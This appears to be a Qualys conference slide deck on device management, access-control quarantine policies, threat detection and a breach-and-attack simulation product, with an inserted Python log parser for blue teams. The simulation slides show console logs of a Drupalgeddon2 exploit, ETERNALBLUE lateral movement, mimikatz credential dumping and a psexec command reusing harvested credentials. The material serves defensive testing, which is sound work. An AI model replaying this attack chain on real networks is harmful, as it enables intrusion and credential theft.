Assets (Search for assets | Last 30 Days)

Columns: LAST SEEN | ASSET INFORMATION | OPERATING SYSTEM | STATUS | INVENTORY TAGS

1. Mark (Android, LENOVO) - Last seen Oct 05, 2018 10:18 AM IST
   OS: Android 7.0 | Status: Enrolled, Active | Tags: Android
   Corporate - Owned | Device ID 865596033698730 | Lenovo TAB | Modified On: Oct 05, 2018
2. Jack (Android, LENOVO) - Last seen Oct 04, 2018 06:53 PM IST
   OS: Android 7.0 | Status: Enrolled, Active | Tags: Android, 1 more
   Corporate - Owned | Device ID 863854038393019 | Lenovo TAB 7 | Modified On: Oct 04, 2018
3. Andy (Android, LENOVO) - Last seen Oct 04, 2018 06:46 PM IST
   OS: Android 7.0 | Status: Enrolled, Active | Tags: Android, 1 more
   Corporate - Owned | Device ID 864557031194883 | Lenovo TAB 7 | Modified On: Oct 04, 2018
4. James (iOS, Apple) - Last seen Oct 04, 2018 06:44 PM IST
   OS: iOS 12.0 | Status: Enrolled, Active | Tags: iOS, 1 more
   Corporate - Owned | Device ID 353779083466914 | Modified On: Oct 04, 2018
5. Richard (iOS, Apple) - Last seen Oct 04, 2018 06:33 PM IST
   OS: iOS 11.2.5 | Status: Enrolled, Active | Tags: iOS
   Corporate - Owned | Device ID 359497088355545 | iPhone | Modified On: Oct 04, 2018
6. Michael (Android, Motorola) - Last seen Oct 03, 2018 06:59 PM IST
   OS: Android 7.1.2 | Status: Enrolled, Active | Tags: Android, 1 more
   Device ID 911503554758228 | Moto G (5S) | Modified On: Oct 03, 2018
7. William (Android, Asus) - Last seen Sep 28, 2018 06:15 PM IST
   OS: Android 7.0 | Status: Enrolled, Active | Tags: Android, 1 more
   Corporate - Owned | Device ID 358525085658221 | Modified On: Sep 28, 2018
8. Charles (Android, Asus) - Last seen Sep 25, 2018 06:10 PM IST
   OS: Android 7.1.1 | Status: Enrolled, Active | Tags: Android, 1 more
   Corporate - Owned | Device ID 351558072379425 | ZenFone Zoom S | Modified On: Sep 25, 2018
Asset Details: Station10_Tab1_LENOVO

Asset Summary
Station10_Tab1_LENOVO (Rename)
Android v7.0
Manufacturer: Lenovo / Model: Lenovo TB-7504X
Status: Unauthorized Root Access - Non Compliant
Passcode: Present | Encryption | Profiles

Identification
Asset Name: Lenovo TB-7504X
Status: Enrolled
Mode: Active
Ownership: Corporate - Owned
Username: fCgby8os
User Email: -
Enrolled with AFW: Yes

Activity
Last Seen: Nov 14, 2018 12:05 PM PST
Enrolled On: Oct 9, 2018 11:29 AM PST
Modified On: Oct 10, 2018 11:29 AM PST

Last Location
Fuquay-Varina, North Carolina, United States
Last Seen: Nov 14, 2018 12:05 PM PST
Asset Details: Station10_Tab1_LENOVO - Apps

Required apps (NAME | IDENTIFIER | VERSION | SYSTEM APP | STATUS | DETECTED ON)
ACME Auto Service Booking | com.acme.auto.service.booking | 1.1 (2) | No | Missing | Nov 09, 2018 09:30 PM PST
ACME Customer Feedback | com.acme.cust.feedback | - | No | Found | Nov 09, 2018 09:30 PM PST

Device Apps (13), showing 1-13 of 13
(NAME | IDENTIFIER | VERSION | SYSTEM APP | USES MOCK LOCATION | INSTALLED ON | ACTION)
TeamViewer | com.teamviewer.teamviewer.marke... | 14.0.35 (140035) | No | No | Nov 09, 2018 04:37 PM PST | Uninstall
Inkwire | com.koushikdutta.inkwire | 1.0.1.7 (1499133600) | No | No | Nov 09, 2018 04:23 PM PST | Uninstall
Gboard | com.google.android.inputmethod.la... | 7.7.12.219989447 (2... | Yes | No | Nov 09, 2018 12:49 PM PST
Gmail | com.google.android.gm | 8.10.21.220187835... | Yes | No | Nov 09, 2018 12:49 PM PST
OneAssistant | ...oneassist | V25 (25) | No | No | Nov 09, 2018 12:32 PM PST | Uninstall
Home | com.google.android.apps.chromec... | 26.6.19 (20606190) | No | No | Nov 09, 2018 10:12 PM PST | Uninstall
Maps | com.google.android.apps.maps | 10.3.1 (1003101040) | Yes | No | Nov 08, 2018 10:26 PM PST
Google Play Movies & TV | com.google.android.videos | 4.8.2018 (40820181) | Yes | No | Nov 06, 2018 10:40 PM PST
Gallery | com.oneplus.gallery | 2.10.10 (22270465) | Yes | No | Nov 06, 2018 10:40 PM PST
Drive | com.google.android.apps.docs | 2.18.432.04.40 (18423... | Yes | No | Nov 06, 2018 10:39 PM PST
SnoopSnitch | de.srlabs.snoopsnitch | 2.0.7 (35) | No | No | Nov 05, 2018 12:02 PM PST | Uninstall
YouTube | com.google.android.youtube | 13.44.51 (134451340... | Yes | No | Nov 05, 2018 11:38 PM PST
Google Play Store | com.android.vending | 12.4.14-all [0] [PR] 21... | Yes | No | Nov 05, 2018 11:35 PM PST

QSC Conference © Qualys.
Asset Details: Station10_Tab1_LENOVO - Actions

Lock: Locks the screen of the asset. The asset is unusable until it is unlocked.
Send Message: Sends a message to the user of the asset. The message is delivered as a push notification.
Communication mode:
  Poll Mode: the asset contacts the Qualys server at the specified regular interval.
  Push Mode: the Qualys server contacts the asset only when a new action is scheduled for it.
Buzz and locate: The asset buzzes and its current geolocation is sent to the server, provided Location Services are enabled.
Sync: Syncs asset information on demand.
De-enroll: The asset is de-enrolled and the server can no longer communicate with the device. Corporate data on the asset is also deleted.
Factory Reset: The asset is factory reset. The server can no longer communicate with the asset.
Privacy
- DIY Portal
- Audit Control
- Ownership (Corporate/BYOD)
- Transparency

Feb 2019 - Closed Beta
Multiple releases during 2019
Security Analytics & Orchestration

Human Guided Response
- Playbooks for Bi-Dir Integration
- BYOP - Bring-Your-Own-Playbook

Policy-Driven Response & Correlation
- Detect KNOWN threats w/ out-of-box rules

Cross-Product Correlation & Additional Context from 3rd Party Ecosystems/Sources

Advanced Analytics
- Detect UNKNOWN threats using Machine Learning
- Hacker Behavioral Analytics
- Predictive & Prescriptive SoC

Security Analytics & Orchestration Apps

ML/AI: Patterns | Outlier | Predictive SoC
Service Orchestration & Automation Response: Ecosystems Integration | Playbooks
UEBA: User & Entity Behavior Analytics
Threat Hunt: Search | Exploration | Behavior Graph
Security Analytics: Anomaly | Visualization | Dashboard
Advanced Correlation: Actionable Insights | Out-of-box Rules

Qualys Security Data Lake Platform: Data Ingestion | Normalization | Enrichment | Governance

Data sources (via Qualys Quick Connectors): Network | Security | Server | Endpoint | Qualys Apps | Cloud | Users
Characteristics of Data Lake
- Collect Anything
- Dive in Anywhere
- Flexible Access
- Future Proof

What is Security Data Lake?
- Single data store (single source of truth)
- Structured and unstructured data
- Data is transformed, normalized, and enriched (Threat Intelligence feed integration, GeoIP, etc.)
- Data has governance, semantic consistency, and access controls
- Store-once / Process-once / Use-multiple:
  apps, dashboards, data analytics;
  cross product search, reporting, visualization;
  machine learning, forensics, etc.
Qualys Apps
- Graphs/Topology
- Reports
- Dashboards
- Search & correlation
- Cyber threat hunting
- Orchestration, Automation & Alerting
- Anomaly detection
- User & entity behavior analytics
Secure Access Control

Agenda
- What is Secure Access Control
- Use-cases
- Capabilities
- Policy-based orchestration
- Operationalizing Secure Access Control
- Mockups
Use Cases
- Grant access to resources only on a need basis. Block everything else.
- Automated asset attribute processing and enforcement without the need for manual action.
- Limit access (e.g. quarantine) of vulnerable assets.
- Block vulnerable assets from accessing critical network resources.

Use Cases
- Asset Inventory - Access control using asset inventory attributes

Use Cases
- Vulnerabilities - Quarantine assets if vulnerable
  (Diagram: Vulnerability Found - Employee Laptop - update.microsoft.com)

Use Cases
- Compliance - Block assets which fail compliance
Policy-based Orchestration
(Diagram: Security Control - Trigger - Server.company.co)
Indicators of Compromise (DASHBOARD | HUNTING | INCIDENTS | ASSETS | RULES) - Alerts, Last 30 days

Total Events: 64K
TYPE: file 1.4K | mutex 300 | network 200 | process 300 | registry 100 | 2 more
EVENT ACTION: connected 400 | created 300 | deleted 200 | disconnected 123
SCORE: 10 (564) | 8 (421) | 3 (288)
Quick Actions: Event Details | Asset Details | Quarantine | Delete File

Events (TIME | OBJECT | ASSET), all on WIN8-1-UN-PATCH (10.115.76.190), all "a minute ago" at 12:10:17 AM:
- WmiPrvSE.exe - C:\Windows\system32\wbem\wmiprvse.exe
- \BaseNamedObjects\F659A567-8ACB-4E4A-92A7-5C2DD18... - taskhost.exe
- SearchProtocolHost.exe - C:\Windows\system32\SearchProtocolHost.exe
- UDP CONNECTION - CLOSED by svchost.exe
- taskhost.exe - C:\Windows\system32\taskhost.exe
- UDP CONNECTION - CLOSED by svchost.exe
- SearchFilterHost.exe - C:\Windows\system32\SearchFilterHost.exe


Quarantine Asset (step 1)

Policy: ( ) Auto Create New Policy  (o) Select From Existing Policies
Policy Name: Select
- Quarantine for all MacOS: Policy to quarantine all macOS vulnerability
- Block all wannacry: Policy to block all WannaCry vulnerable assets
- Quarantine Policy for QSC: Policy to block all QSC vulnerable assets

Policy: (o) Auto Create New Policy  ( ) Select From Existing Policies
Policy Name: Quarantine policy for Asset: 10.19.57.65
Description: This is an auto created Quarantine policy for Asset

Step 2: View & Define
Secure Access Control - Policies (DASHBOARD | POLICIES | MONITORING | CONFIGURATION) - John Doe (jdoe_quays)

Total Policies: 12

Filters
STATUS: Enabled (07) | Disabled (05)
DYNAMIC ASSET CRITERIAS: High Vulnerability Mac | All Corporate Assets | All Windows Assets | All Linux Assets | All Mac Assets | All Laptops
STATIC ASSET LIST: Build Servers | Management Assets | All Printers | IOT Devices | Blacklisted Hosts | Blacklisted Mac Addresses
RULE TYPE: Outbound | Inbound
ACTIONS: Allow | Deny | VLAN Switch
PROTOCOLS: TCP | UDP

Policy list (SEQ. NO. | STATUS | POLICY | RULESET | ELIGIBLE ON ASSETS), showing 1-50 of 79
1. Quarantine Policy for QSC - VLAN 20 - Ruleset: High Vulnerability Mac - eligible on 48 assets
2. Automatic Policy for Asset: 10.19.57.65 - ACL: ACL Name example - Ruleset: WannaCry Assets Criteria - eligible on 22 assets
3. Quarantine all Mac OS High Sierra Vulnerability... - VLAN 20 - Ruleset: High Vulnerability Mac - eligible on 48 assets
4. Block all WannaCry Vulnerable assets - ACL: ACL Name example - Ruleset: WannaCry Assets Criteria - eligible on 22 assets
5. Notify all Heartbleed Vulnerable openSSL servers - Traffic Rules: Quarantine Ruleset - Ruleset: Heartbleed Asset Criteria - eligible on 35 assets
6. Quarantine VLAN if OS is not updated - Traffic Rules: OS Update Check Ruleset - Ruleset: Assets Missing OS Update - eligible on 77 assets
7. Quarantine VLAN if Antivirus is not updated - Traffic Rules: 3 Rules - Ruleset: Assets Missing AV Updates - eligible on 11 assets
8. Access to engineering resources for engineering team - Traffic Rules: 3 Rules - Ruleset: High Vulnerability Mac - eligible on 322 assets
9. Policy for feedback Kiosk at reception - Traffic Rules: 3 Rules - Ruleset: High Vulnerability Mac - eligible on 123 assets
10. Block all outbound connections to Chinese servers - Traffic Rules: 3 Rules - Ruleset: High Vulnerability Mac - eligible on 123 assets
11. Deny access to all vulnerable laptops - Traffic Rules: 3 Rules - Ruleset: High Vulnerability Mac - eligible on 72 assets
12. Quarantine Vulnerable servers - Traffic Rules: 3 Rules - Ruleset: High Vulnerability Mac - eligible on 48 assets
Criteria (Create New: Criteria)

Criteria types: User | Hosts/Assets | Vulnerability | Compliance | Malware | Location
Saved Criterias: WannaCry Asset Criteria | Custom Criteria | Custom Criteria

WannaCry Asset Criteria

Rule 1: New or Active Vulnerability
When a vulnerability is: [x] New  [ ] Fixed  [x] Active  [ ] Reopened
Select Criteria: Users | Hosts | Vulnerability | Compliance | Malware | Location

Vulnerability Criteria
Type: [x] Confirmed  [x] Potential
Severity: (select)
Title: (select)
CVE: Is in the list (select)
CVSS Score: (select)
+ Add Criteria
Cancel
View Details: WIN-HL64HBLJP02

VIEW MODE: Summary | System Information | Agent Summary | Network Information | Open Ports | Installed Software | Vulnerabilities | Threat Protection | File Integrity Monitoring | Indicator of Compromise | Patch Management | Security Access Control

Security Access Control
- Access to engineering resources fo... - Nov 09, 2018 at 10:05 AM
- Allow internal server access to all e... - Nov 09, 2018 at 9:17 AM
- Allow internet access to all employe... - Nov 09, 2018 at 9:15 AM
- Outbound connections to malicious websites
- Prevent access to finance and payroll server
- Quarantine VLAN if Antivirus is not updated

POLICY TIMELINE (Today, 9:00 AM - 1:00 PM - Now; P1-P5): Oct 12, 2018, 2:13 AM - Quarantine Policy Applied...
POLICY ELIGIBILITY TIMELINE (Today, 9:00 AM - 1:00 PM - Now; P1-P5)
LAST 5 ENFORCED POLICIES (POLICY NAME | TIME) | NEVER ENFORCED ELIGIBLE POLICIES (POLICY NAME)
Best of Two Worlds

In-Line Appliance
- Reliable first hand data
- Low latency for data collection & enforcement

Out of Band Switches
- Multiple enforcement options
- Traffic volume agnostic

SAC offers both modes: Powerful Together - Unique Value Proposition
Breach & Attack Simulation

Problems
- Limited assessment scope and capabilities
- Red Team operations can get expensive, are not scalable, and lack completeness across the enterprise
- Lack of confidence in the effectiveness of security investments - prevention and detection
- Blue Teams struggle to evaluate the impact of new attacks against their existing security controls
Breach and Attack Simulation (DASHBOARD | SCANS | ASSETS | CAMPAIGNS) - mdani (admin271)
Filter by Asset Tags | Last 30 days | Last refreshed 2 minutes ago

AVAILABLE CAMPAIGNS / TECHNIQUES counters: 943 | 7 | 20 | 263
Automated simulation of real-world TTPs vs. 187 scanned techniques

TACTICS OVERVIEW BY FAILING TECHNIQUES (Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control)

ASSET BREAKDOWN BY SEVERITY: 1.1K Total

TOP 5 FAILING TECHNIQUES
- Application Shimming - 165 (High)
- Exploit Public-Facing Application - 84 (High)
- Logon Scripts - 83
- Email Collection - 73
- File System Permissions Weakness - 64

SCANS BY STATUS: 22 Total (scheduled 6)

MOST FAILING CAMPAIGNS
- weakness.exploit.msword.phish - Jan 01, 2018 - 165
- exploit.compliance.eternalblue - Feb 15, 2018 - 84
- weakness.compliance.password.reuse - Jun 02, 2018 - 83
- exploit.vulnerability.drupalgeddon2 - Aug 23, 2018 - 73

Technical Approach
- Automated simulation of real-world TTPs
- Scale security assessments across the entire enterprise utilizing Qualys Cloud Agent
- Real-time insights mapped to the MITRE ATT&CK framework
- Transition towards defense strategies based on offensive techniques
- Continuously measure security control drift over time
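A blue-team reader for the console output the later slides show, as an added example written for this page (not Qualys code): it parses lines in the shape the simulation prints ("[date] hh:mm:ss PM [STATUS]: Testing for T1190: ...", "[T1190][INFORMATION]: Test successful"), reduces each ATT&CK technique to a verdict, and diffs two runs to measure control drift. The verdict rule (a technique "succeeded", meaning the control failed, when a line attributed to it reports success) is my choice, and both sample logs are constructed to resemble the slides rather than captured output.

```python
"""Added example, not Qualys code: reduce simulation console logs to a
per-technique verdict and measure control drift between two runs.
The log format follows the slides; both logs below are constructed."""
import re
from typing import Dict, List, Tuple

LINE_RE = re.compile(
    r"^\[(?P<date>[^\]]+)\]\s+(?P<time>\d{2}:\d{2}:\d{2})\s+[AP]M\s+"
    r"(?P<tags>(?:\[[^\]]+\])+)\s*:\s*(?P<msg>.*)$")
TESTING_RE = re.compile(r"Testing for (?:\d+ of \d+ technique\(s\) - )?(T\d{4}):\s*(.+)")
TECH_TAG_RE = re.compile(r"\[(T\d{4})\]")
SUCCESS_RE = re.compile(r"Test successful|Successfully exploited|Module \S+ successful")


def parse_run(log: str) -> Dict[str, Dict[str, str]]:
    """Return {technique_id: {"name": ..., "verdict": "succeeded" | "held"}}.
    A technique is recorded when a [STATUS] line announces it. It becomes
    "succeeded" (the control failed) if a later line tagged with it, or an
    untagged line before the next technique starts, reports success."""
    verdicts: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in log.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue                      # prompts, blank and wrapped lines
        tags, msg = m.group("tags"), m.group("msg")
        t = TESTING_RE.search(msg)
        if "[STATUS]" in tags and t:
            current = t.group(1)
            verdicts.setdefault(current, {"name": t.group(2).strip(), "verdict": "held"})
            continue
        tag = TECH_TAG_RE.search(tags)
        tech = tag.group(1) if tag else current
        if tech in verdicts and SUCCESS_RE.search(msg):
            verdicts[tech]["verdict"] = "succeeded"
    return verdicts


def summarize(verdicts: Dict[str, Dict[str, str]]) -> Dict[str, int]:
    succeeded = sum(1 for v in verdicts.values() if v["verdict"] == "succeeded")
    return {"tested": len(verdicts), "succeeded": succeeded, "held": len(verdicts) - succeeded}


def drift(baseline: Dict[str, Dict[str, str]],
          current: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Techniques whose verdict changed between runs, as (id, old, new)."""
    changes = []
    for tech in sorted(set(baseline) | set(current)):
        old = baseline.get(tech, {}).get("verdict", "untested")
        new = current.get(tech, {}).get("verdict", "untested")
        if old != new:
            changes.append((tech, old, new))
    return changes


# Constructed baseline run: three techniques tested, all three succeed.
BASELINE_LOG = """
[20/Nov/2018] 13:54:01 PM [STATUS]: Testing for T1190: Exploit Public-Facing Application
[20/Nov/2018] 13:54:09 PM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
[20/Nov/2018] 13:54:40 PM [STATUS]: Testing for T1210: Exploitation of Remote Services
[20/Nov/2018] 13:54:41 PM [EXPLOIT]: Module ETERNALBLUE successful.
[20/Nov/2018] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts
[20/Nov/2018] 14:32:36 PM [T1078][INFORMATION]: Test successful.
[20/Nov/2018] 14:32:40 PM [STATUS]: All tests complete.
"""

# Constructed follow-up run after remediation: only the credential reuse still succeeds.
CURRENT_LOG = """
[11/10/2018] 10:01:27 AM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application
[11/10/2018] 10:01:28 AM [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog
[11/10/2018] 10:01:40 AM [STATUS]: Testing for T1210: Exploitation of Remote Services
[11/10/2018] 10:01:41 AM [T1210][INFORMATION]: Module ETERNALBLUE in progress
[11/10/2018] 10:02:33 AM [STATUS]: Testing for T1078: Valid Accounts
[11/10/2018] 10:02:36 AM [T1078][INFORMATION]: Test successful.
[11/10/2018] 10:02:40 AM [STATUS]: All tests complete.
"""

if __name__ == "__main__":
    b, c = parse_run(BASELINE_LOG), parse_run(CURRENT_LOG)
    print(summarize(b), summarize(c), drift(b, c))
```

Attributing untagged lines (such as `[EXPLOIT]`) to the technique most recently announced by a `[STATUS]` line is what lets the parser score ETERNALBLUE under T1210 even though that line carries no technique tag; the drift list is the figure a blue team would track over time, with a "held" to "succeeded" transition being the regression worth alerting on.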




Qualys Breach and Attack Simulation (v0.1)

Breach & Attack Simulation
- Centralized command-and-control framework on Cloud Agent
- When enabled, agents ... adversaries
- Non-destructive TTPs or live exploits

Agent console commands (Description)
- Show contents of a file
- Connect to an agent
- List connected agents
- Show this help menu
- Kill an active agent connection
- List files in current directory
- Get current working directory
- zip <file>: Zip a file
- download <url>: Download a file from the asset
- upload <url>: Upload a file to the asset
- Show IP-MAC pairs from system ARP table
- execute <command>: Execute a command on the asset
- openports: Scan and show status for top 1024 TCP ports on the asset
- Collect metadata about the asset
- Cleanup all traces of agent from the asset
- Exit the current agent connection

Modules
Initial Access:
- T1190 - drupalgeddon2: the Drupalgeddon2 exploit
- T1190 - apachestruts: the Apache Struts S2-057 exploit
Execution:
- psexec: Psexec for command execution
- T1191 - cmstp: CMSTP.exe with a malicious .inf file for file execution
- T1173 - windde: DDE to run arbitrary commands
Persistence:


Breach & Attack Simulation - Use case: Drupalgeddon2 (CVE-2018-7600)

>>> use 1
[+] Opening up live session with agent #1 (192.168.1.100)
(agent #1) >>> drupalgeddon2
Please provide URL for a public facing Drupal webapp (https://corpdomain.tld/blog):
[20/Nov/2018] [STATUS]: Testing for T1190: Exploit Public-Facing Application
[20/Nov/2018] [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog
[20/Nov/2018] [T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tld/blog/CHANGELOG.txt
[20/Nov/2018] [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
[20/Nov/2018] [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbfec29g)
[20/Nov/2018] [STATUS]: Waiting for connection from sda32fds.exe
[20/Nov/2018] [STATUS]: Connection received on TCP 32282
[20/Nov/2018] [STATUS]: Process information sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf8c29g)
[20/Nov/2018] [INFORMATION]: Current QAttack agent privileges: user
[20/Nov/2018] [SYSTEMINFO]: Currently logged on user: CORP/user1
[20/Nov/2018] [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601)
[20/Nov/2018] [SYSTEMINFO]: Processor: Intel(R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz
[20/Nov/2018] [SYSTEMINFO]: Installed memory (RAM): 12.0 GB
[20/Nov/2018] [SYSTEMINFO]: System type: 64-bit Operating System, x64-based processor
[20/Nov/2018] [SYSTEMINFO]: Locale: EN-US
[20/Nov/2018] [SYSTEMINFO]: Computer name: THINKPAD-111991-M710
[20/Nov/2018] [SYSTEMINFO]: Full computer name: T-111991-M710.corp.domain.com
[20/Nov/2018] [SYSTEMINFO]: Domain: corp.domain.com
[20/Nov/2018] [SYSTEMINFO]: Anti Virus installed: Yes
[20/Nov/2018] [SYSTEMINFO]: Anti Virus detected: Symantec Endpoint Protection Small Business Edition 3.00.
[20/Nov/2018] [STATUS]: T1018:
Found 3 neighbors using discovery module
[20/Nov/2018] [INSECURECONFIG]: Found SMBv1 enabled on 192.168.1.101
[20/Nov/2018] [STATUS]: Testing for T1210: Exploitation of Remote Services
[20/Nov/2018] [EXPLOITSUGGESTER]: Launching ETERNALBLUE module against 192.168.1.101
[20/Nov/2018] [T1210][INFORMATION]: Module ETERNALBLUE in progress
[20/Nov/2018] [EXPLOIT]: Sent 308B shellcode
[20/Nov/2018] [EXPLOIT]: Module ETERNALBLUE successful.
[20/Nov/2018] [LATERALMOVEMENT]: Pivoting from 192.168.1.100 to 192.168.1.101 via Module ETERNALBLUE
[20/Nov/2018] [EXPLOIT]: QAttack agent copy sent to 192.168.1.101
[20/Nov/2018] [INFORMATION]: QAttack agent information: sdfwe3223d.exe (SHA1: e41a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
[20/Nov/2018] 13:55:10 PM [STATUS]: All tests complete.

(agent #1) >>>
Live View: Drupalgeddon2

IDENTIFICATION
Scan: Drupalgeddon2
Campaign: exploit.vulnerability.drupalgeddon2
Status: InProgress (26%)

TACTICS: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | 6 more
STATUS: Breached | Safe | Error
OPERATING SYSTEM: Windows 2012 Server | Windows Server 2012 R2 | Windows Server 8.1 | Windows 7 SP1 | Windows 10 ENTERPRISE

TACTICS BREAKDOWN BY STATUS (graph of hosts 192.168.1.100 - 192.168.1.110)
Selected node: IP 192.168.1.100 | Hostname: https://corpdomain.tld | Username: CORP/administrator | Processor: AMD ThreadRipper 1980x | Privileges: administrator
Breached: 192.168.1.101 THINKPAD-98689-M710

[11/10/2018] 10:01:27 AM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application
[11/10/2018] 10:01:28 AM [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog
[11/10/2018] 10:01:35 AM [T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tld/blog/CHANGELOG.txt
[11/10/2018] 10:01:43 AM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
[11/10/2018] 10:01:51 AM [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
[11/10/2018] 10:01:52 AM [STATUS]: Waiting for connection from sda32fds.exe


Breach & Attack Simulation - Use case: Credential Harvesting and Reuse
1. Uploading / running mimikatz
2. Extracting stored credentials
3. Lateral movement

[+] Showing current cache:
Type: kerberos
Username: vswin2k8r2sp1be$
Domain: WORKGROUP

Category: local
Type: wdigest
Username: Administrator
Password: Abcxxxxxxx5
Domain: VSWIN2K8R2SP1BE

Category: local
Type: kerberos
Username: Administrator
Password: Abcxxxxxxx5
Domain: VSWIN2K8R2SP1BE

Category: application:proxy
Type: credman
Username: Administrator
Password: Abcxxxxxxx5
Domain: VSWIN2K8R2SP1BE

mimikatz(commandline) # exit
[20/Nov/2018] 13:58:31 PM [T1003][INFORMATION]:
[20/Nov/2018] 13:58:32 PM [CLEANUP]: Deleted file mimikatz. (SHA1: d40a48094c1f21fef892f27a8b6a7ed2bb0c27f)
[20/Nov/2018] 13:58:33 PM [T1003][INFORMATION]: Passwords extracted: 4
[20/Nov/2018] 13:58:34 PM [T1003][INFORMATION]: Test successful

(agent #1) >>> lateral
[20/Nov/2018] 14:32:29 PM [STATUS]: Testing for T1077: Windows Admin Share
[20/Nov/2018] 14:32:29 PM [SHARE-SCAN]: Scanning for shares on: 192.168.1.101, 192.168.1.102
[20/Nov/2018] 14:32:30 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.101
[20/Nov/2018] 14:32:31 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.102
[20/Nov/2018] 14:32:32 PM [T1077][INFORMATION]: Admin shares enumerated
[20/Nov/2018] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts
[20/Nov/2018] 14:32:34 PM [T1078][INFORMATION]: Testing for passwords retrieved using T1003
[20/Nov/2018] 14:32:35 PM [STATUS]: Windows admin$ share detected on 192.168.1.101
[20/Nov/2018] 14:32:36 PM [T1078][INFORMATION]: Credentials detected administrator:Abcxxxxxxx5
[20/Nov/2018] 14:32:37 PM [STATUS]: Attempting lateral movement using re-used credentials
[20/Nov/2018] 14:32:38 PM [STATUS]: Testing for T1035: Service Execution
[20/Nov/2018] 14:32:38 PM [T1035][INFORMATION]: Read psexec.exe location from configuration: \\software\psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Attempting remote file copy: copy /y \\192.168.1.100\ds345gfed.exe \\192.168.1.101\c$\
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: psexec.exe -nobanner -d \\192.168.1.101 -u administrator -p Abcxxxxxxx5 "C:\ds345gtgd.exe"
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Test successful.
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: End execution: psexec.exe
[20/Nov/2018] 14:32:39 PM [CLEANUP]: Deleted file psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)
[20/Nov/2018] 14:32:40 PM [STATUS]: All tests complete.

(agent #1) >>>


Live View: Password Reuse

IDENTIFICATION
Scan: Password Reuse
Campaign: weakness.compliance.password.reuse
Status: InProgress (34%)

TACTICS: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | 6 more
STATUS: Breached | Safe | Error
OPERATING SYSTEM: Windows 2012 Server | Windows Server 2012 R2 | Windows Server 8.1 | Windows 7 SP1 | Windows 10 ENTERPRISE | 2 more

TACTICS BREAKDOWN BY STATUS (graph of hosts 192.168.1.100 - 192.168.1.107)
Selected node: IP 192.168.1.101 (View details) | Hostname: THINKPAD-98689-M710 | Username: CORP/user1 | Processor: Intel(R) CORE(TM) i7-7770 | Privileges: administrator
Breached: 192.168.1.101 THINKPAD-98689-M710

[11/10/2018] 10:01:11 AM [INFORMATION]: QAttack agent initialized via QAgent. Process name: adfg32dsff.exe
[11/10/2018] 10:01:12 AM [INFORMATION]: Current QAttack agent privileges: user
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Currently logged on user: CORP/user1
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601)
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Processor: Intel(R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Installed memory (RAM): 12.0 GB

Benefits
- Fully and continuously assess known and emerging TTPs against all applications and operating systems
- Red Teams augment manual penetration testing of primary systems with automated testing of secondary and tertiary systems
- Empirically measure the effectiveness of security prevention and detection tools
- Blue Teams configure current tools to perform better or procure new/replacement tools